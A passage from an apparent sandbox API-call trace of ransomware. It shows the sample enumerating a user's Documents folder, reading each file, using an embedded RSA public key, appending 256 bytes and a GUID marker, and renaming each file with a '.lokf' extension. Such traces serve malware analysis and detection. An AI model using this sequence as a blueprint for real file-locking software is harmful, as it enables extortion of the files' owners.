(HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0058.921] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c774d20, ftCreationTime.dwHighDateTime=0x1d4c565, ftLastAccessTime.dwLowDateTime=0xa9288bc0, ftLastAccessTime.dwHighDateTime=0x1d4cf5a, ftLastWriteTime.dwLowDateTime=0xa9288bc0, ftLastWriteTime.dwHighDateTime=0x1d4cf5a, nFileSizeHigh=0x0, nFileSizeLow=0xd918, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q_n6bOaeAdhkjfo2mhI.docx", cAlternateFileName="Q_N6BO~1.DOC")) returned 1 [0058.921] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b3e8 [0058.921] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0058.921] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\q_n6bOaeAdhkjfo2mhI.docx") returned=".docx" [0058.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\q_n6bOaeAdhkjfo2mhI.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\q_n6boaeadhkjfo2mhi.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.921] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=55576) returned 1 [0058.921] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.923] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd8f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.923] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.924] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.924] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xd918, lpOverlapped=0x0) returned 1 [0058.925] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.925] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.925] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.925] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.925] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.925] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.925] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.925] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.925] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.925] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.925] GetLastError () returned 0x0 [0058.925] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.925] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.926] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.926] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.926] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.926] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.926] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.926] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.926] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd918, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.926] WriteFile (in: hFile=0x5cc, lpBuffer=0x3234418*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3234418*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.926] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.926] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.927] CloseHandle (hObject=0x5cc) returned 1 [0058.927] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0058.927] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.928] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\q_n6bOaeAdhkjfo2mhI.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\q_n6boaeadhkjfo2mhi.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\q_n6bOaeAdhkjfo2mhI.docx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\q_n6boaeadhkjfo2mhi.docx.lokf")) returned 1 [0058.929] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf303f550, ftCreationTime.dwHighDateTime=0x1d4ca59, ftLastAccessTime.dwLowDateTime=0x519769b0, ftLastAccessTime.dwHighDateTime=0x1d4cf39, ftLastWriteTime.dwLowDateTime=0x519769b0, ftLastWriteTime.dwHighDateTime=0x1d4cf39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R4I1Q ij0VYYLZ2qE", cAlternateFileName="R4I1QI~1")) returned 1 [0058.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16c) returned 0x9c7a8a0 [0058.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b3e8 [0058.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0058.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bb38 [0058.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269a18 [0058.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32694f0 [0058.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269838 [0058.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0058.929] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb20c760, ftCreationTime.dwHighDateTime=0x1d4c857, ftLastAccessTime.dwLowDateTime=0xd03060c0, ftLastAccessTime.dwHighDateTime=0x1d4cede, ftLastWriteTime.dwLowDateTime=0xd03060c0, ftLastWriteTime.dwHighDateTime=0x1d4cede, nFileSizeHigh=0x0, nFileSizeLow=0xe12c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SfzjItAk.ots", cAlternateFileName="")) returned 1 [0058.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.929] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SfzjItAk.ots") returned=".ots" [0058.929] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SfzjItAk.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sfzjitak.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.929] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=57644) returned 1 [0058.929] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.932] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe106, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.932] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.932] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.933] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xe12c, lpOverlapped=0x0) returned 1 [0058.933] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.933] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.933] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.933] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.933] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.934] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.934] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.934] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.934] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.934] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.934] GetLastError () returned 0x0 [0058.934] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.934] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.934] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.934] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.934] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.934] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.934] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.934] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.935] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe12c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.935] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.935] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.935] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.935] CloseHandle (hObject=0x5cc) returned 1 [0058.936] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0058.936] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.936] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SfzjItAk.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sfzjitak.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SfzjItAk.ots.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sfzjitak.ots.lokf")) returned 1 [0058.937] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x946fcb80, ftCreationTime.dwHighDateTime=0x1d55673, ftLastAccessTime.dwLowDateTime=0x65181a70, ftLastAccessTime.dwHighDateTime=0x1d56499, ftLastWriteTime.dwLowDateTime=0x65181a70, ftLastWriteTime.dwHighDateTime=0x1d56499, nFileSizeHigh=0x0, nFileSizeLow=0xafed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tfEuvyompjnimS.xlsx", cAlternateFileName="TFEUVY~1.XLS")) returned 1 [0058.937] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.937] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.937] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tfEuvyompjnimS.xlsx") returned=".xlsx" [0058.937] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tfEuvyompjnimS.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tfeuvyompjnims.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.938] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=45037) returned 1 [0058.938] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.940] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xafc7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.940] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.941] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xafed, lpOverlapped=0x0) returned 1 [0058.941] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.941] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.941] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.941] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.942] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.942] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.942] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.942] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.942] GetLastError () returned 0x0 [0058.942] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.942] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.942] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.942] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.942] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.942] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.943] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xafed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.943] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.943] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.943] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.943] CloseHandle (hObject=0x5cc) returned 1 [0058.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.944] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tfEuvyompjnimS.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tfeuvyompjnims.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tfEuvyompjnimS.xlsx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tfeuvyompjnims.xlsx.lokf")) returned 1 [0058.945] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, 